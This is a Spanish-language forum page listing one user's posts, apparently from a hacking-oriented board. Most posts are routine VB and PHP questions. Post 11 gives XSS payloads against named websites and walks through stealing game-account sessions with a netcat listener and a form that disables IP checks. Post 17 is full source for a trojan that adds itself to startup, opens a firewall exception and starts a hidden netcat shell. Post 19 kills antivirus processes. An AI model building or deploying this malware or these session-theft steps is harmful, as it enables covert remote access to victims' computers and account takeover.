|
Mostrar Temas
|
Páginas: 1 [2] 3
|
11
|
Seguridad Informática / Nivel Web / Cross Site Scripting (XSS)
|
en: 22 Abril 2007, 04:20 am
|
Cross Site Scripting (XSS)Dado que la información aqui mostrada no muestra links directos a terceros, pero que se puede inferir el link, el que desee que se quite algun link aqui mostrado, hagalo saber..El autor no se hace responsable de los malos usos que se le de a este documento...<META HTTP-EQUIV="Refresh" CONTENT="1; URL=javascript:document.forms[0].submit()"> <form action="http:// s e x y o n o .com/grupos/" method="POST"> <input type="hidden" name="buscargrupo" value=" <script>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83))</script>"> </form> http://www. v o t a m i c u e r p o .com/usuario.php?funcion=bloqueados&usuario= <SCRIPT>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83));</script>& Submit=Bloquear http://ogameXXX.de/game/redir.php?url= "><script>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83))</script>
He encontrado más XSS esta semana, y varias son de páginas de alto prestigio, tipo MSN Hotmail, MSN Live, etc. Pero prefiero no publicarlo para evitar malos usos... a cambio les he dejado esto. Os depcepcionaré al deciros que el último XSS no os servirá para lo que estais pensando, pues los contenidos de la cookie de oGame caracen de valor administrativo. Pero quizás os alegre saber que en la variable session se deposita todo el valor necesario para administrar cualquier cuenta, tan solo es necesario que la víctima utilice un skin alojado en nuestro servidor o preguntarle el valor de la session mediante IS. Al desconocer su valor, no le dará ninguna importancia a esta. Una vez cambiado el skin, desde nuestra máquina ponemos el netcat a escuchar el puerto 80 (nc -vv -L -p 80) para capturar la session, cerramos la conexión y a continuación hacemos que la victima ingrese en este formulario para desactivarle el IP-CHECK y así poder acceder a la misma session con IPs diferentes. <META HTTP-EQUIV="Refresh" CONTENT="1; URL=javascript:document.forms[0].submit()"> <form action="options.php?session=SESSION&mode=change" method="POST" > <input type="hidden" name="dpath" value="http://127.0.0.1/skin/"> <input type="checkbox" name="design" checked> <input type="checkbox" name="noipcheck" checked> </form> Deberá identificarse de nuevo, así que volveremos a capturar la session, y una vez capturada ya podremos acceder a la cuenta... <frameset framespacing="0" border="0" cols="190,*" frameborder="0"> <frame name="Inhalt" target="Hauptframe" src="http:/ogameXXX/game/leftmenu.php?session=SESSION" noresize marginwidth="0" marginheight="0"> <frame name="Hauptframe" src="http://ogameXXX.de/game/overview.php?session=SESSION" target="_blank"> <noframes></noframes></frameset> Quien quiera compartir información de cualquier tipo o tenga proyectos en mente, estaré encatado de conversar/devatir nuevas ideas, ¡Hasta entonces! PD: Por favor, eviten el uso del nombre de las páginas de las primeras dos inyecciones XSS para que google no las incluya en su buscador, gracias.
|
|
|
12
|
Programación / PHP / Unir variables
|
en: 18 Abril 2007, 16:54 pm
|
<?php
// A partir de esto quiero formar la variable $var1 para operar más tarde con ella $var; $num = "1";
echo $var1;
?> Se que se puede por que en una ocasion me respondieron a esta misma duda en el IRC, pero la olvidé... A ver si alguien tiene la respuesta, saludos!
|
|
|
13
|
Programación / Programación Visual Basic / Cursor
|
en: 27 Agosto 2006, 15:17 pm
|
Alguien sabe de donde puedo sacar el cursor ese que aparece al pasar el puntero por encima de un enlace? no lo encuentro por ninguna parte, y en el VB no está.
|
|
|
14
|
Programación / Programación Visual Basic / Barra de tareas
|
en: 26 Agosto 2006, 20:12 pm
|
He buscado la opcion de bloquear la barra de tareas en el registro pero no la encuentro, también he buscado alguna api para saber si está bloqueada o no, pero a lo máximo que he llegado ha sido a RunDll32.exe shell32.dll,Options_RunDLL 1
Saludos
|
|
|
15
|
Programación / Programación Visual Basic / Inet (Código fuente web)
|
en: 1 Junio 2006, 19:01 pm
|
Cuando compilo esto y lo ejecuto no me muestra el codigo fuente entero, sino que se corta por el caracter 3000 y algo, y no solo en esa pagina, si no en muchas más que tienen el código fuente largo, porque puede ser? alguna solución? code = Inet.OpenUrl "http://www.hl2spain.com" text1.text = code
|
|
|
16
|
Programación / Programación Visual Basic / Reproducir WAV
|
en: 31 Mayo 2006, 00:38 am
|
Este es el código Declare Function mciExecute Lib "winmm.dll" (ByVal lpstrCommand As String) As Long Private Sub Form_Load() iResult = mciExecute("Play c:\carpeta 1\setup0.wav") End Sub
El problema es que no reconoce la ruta porque encuentra un espacio, alguna solucion para arreglarlo? u otra manera de reproducir archivos wav?
|
|
|
17
|
Programación / Programación Visual Basic / Intrusion NetCat [Código]
|
en: 2 Marzo 2006, 21:15 pm
|
1º Descargamos el NetCat y lo guardamos en "C:\nc.exe". INC.bas ' Intrusion NetCat by YeIk0s ' No me responsabilizo de los malos usos que se le de a este código
Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Public Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Public Const REG_SZ = 1 Public Const HKLM = &H80000002
Dim Car As String * 128, DirSystem As String, KeyFirewall As String, KeyRun As String, UrlPhp As String
Function RegistrySetValueData(MasterKey, Key, Value, ValueData) Dim nBufferKey As Long RegOpenKey MasterKey, Key, nBufferKey RegSetValueEx nBufferKey, Value, 0, REG_SZ, ValueData, Len(ValueData) End Function
Sub Main() On Error Resume Next DirSystem = RTrim$(LCase$(Left$(Car, GetSystemDirectory(Car, "128")))) DirWindows = RTrim$(LCase$(Left$(Car, GetWindowsDirectory(Car, "128")))) UrlPhp = "http://127.0.0.1" KeyFirewall = "SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List" KeyRun = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
FileCopy App.Path & "\" & App.EXEName & ".exe", DirSystem & "\inc.exe" RegistrySetValueData HKLM, KeyFirewall, DirSystem & "\nc.exe", DirSystem & "\nc.exe:*:Enabled:nc" RegistrySetValueData HKLM, KeyRun, "NvCpIDaemon", DirSystem & "\inc.exe"
If Len(Dir(DirSystem & "\nc.exe")) = 0 Then Dim Str1 As String, Str2 As String, NewFile As String, AllFile As String
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 AllFile = Space(LOF(1)) Get #1, , AllFile Close #1
Str1 = InStrRev(AllFile, "€ø§ø", -1) Str2 = InStrRev(AllFile, "ø§ø€", -1) NewFile = Trim(Mid$(AllFile, Str1 + 4, Str2 - Str1 - 4))
Open DirSystem & "\nc.exe" For Binary As #2 Put #2, , NewFile Close #1 End If
Call ShellExecute(hwnd, "Open", ("iexplore.exe"), UrlPhp, vbNullString, 0) Shell "cmd.exe /c nc -L -p 5555 -e cmd.exe", vbHide
End Sub
2º Compilamos INC.bas y lo guardamos en "C:\inc.exe". Inyector.bas ' Inyector by YeIk0s
Option Explicit Const signo1 = "€ø§ø" Const signo2 = "ø§ø€" Dim DirNC As String, DirINC As String, size As String * 1, i As Long
Sub Main()
DirNC = "C:\nc.exe" ' NetCat original DirINC = "C:\inc.exe" ' Archivo donde inyectaremos el NC
Open DirNC For Binary As #1 Open DirINC For Binary As #2 Put #2, LOF(2) + 1, signo1 For i = 1 To FileLen(DirNC) Get #1, i, size Put #2, LOF(2) + 1, size Next Put #2, LOF(2) + 1, signo2 Close #2 Close #1 End Sub
3º Compilamos Inyector.bas y lo ejecutamos. Ya tenemos listo nuestro INC, al ejecutarlo se autocopia asi mismo al directorio system32, añade al registro una clave para que no detecte el firewall de Windows XP la conexión saliente del netcat, se inicia automáticamente al incio del sistema (regedit), luego extra el NC del propio archivo y lo extrae en el directorio system32, por ultimo hace una conexión HTTP (iexplorer) hacia X página web para averiguar la IP de la victima y lanza la shell del NC de forma oculta mediante el cmd.
|
|
|
18
|
Programación / Programación Visual Basic / Escalar directorios
|
en: 4 Octubre 2005, 22:54 pm
|
Estoy intentando realizar una búsqueda de archivos de todas las unidades disponibles escalando a su vez todos los directorios, pero solo consigo realizar un listado de las unidades, luego no se como hacer para id metiendome directorio a directorio, a ver si me pueden ayudar.
|
|
|
19
|
Programación / Programación Visual Basic / Cerrar procesos de antivirus/cortafuegos
|
en: 17 Septiembre 2005, 08:53 am
|
Private Sub Command1_Click() KillProcess ("aplicacion.exe") End Sub
Public Sub KillProcess(ByVal processName As String) On Error GoTo ErrHandler Dim oWMI Dim ret Dim sService Dim oWMIServices Dim oWMIService Dim oServices Dim oService Dim servicename Set oWMI = GetObject("winmgmts:") Set oServices = oWMI.InstancesOf("win32_process") For Each oService In oServices
servicename = LCase(Trim(CStr(oService.Name) & ""))
If InStr(1, servicename, LCase(processName), vbTextCompare) > 0 Then ret = oService.Terminate End If
Next
Set oServices = Nothing Set oWMI = Nothing
ErrHandler: Err.Clear End Sub Para cerrar procesos que no sean para la propia seguridad del PC funcionana correctamente. He intentado cerrar el Kaspersky Anti-Virus Personal Pro 5.0 (KAV.exe) y lo cierra correctamente, he probado con el Panda y nada, podriais hacer un chequeo con vuestros antivirus/cortafuegos y comunicadme si funciona correctamente?
|
|
|
20
|
Programación / Programación Visual Basic / Carpeta IE
|
en: 12 Septiembre 2005, 13:48 pm
|
Puesto que con las API´s se puede saber la versión del IE, se podrá saber también en que carpeta está alojado? de no ser posible se podria saber el directorio de Archivos de programas?
|
|
|
|
|
|
|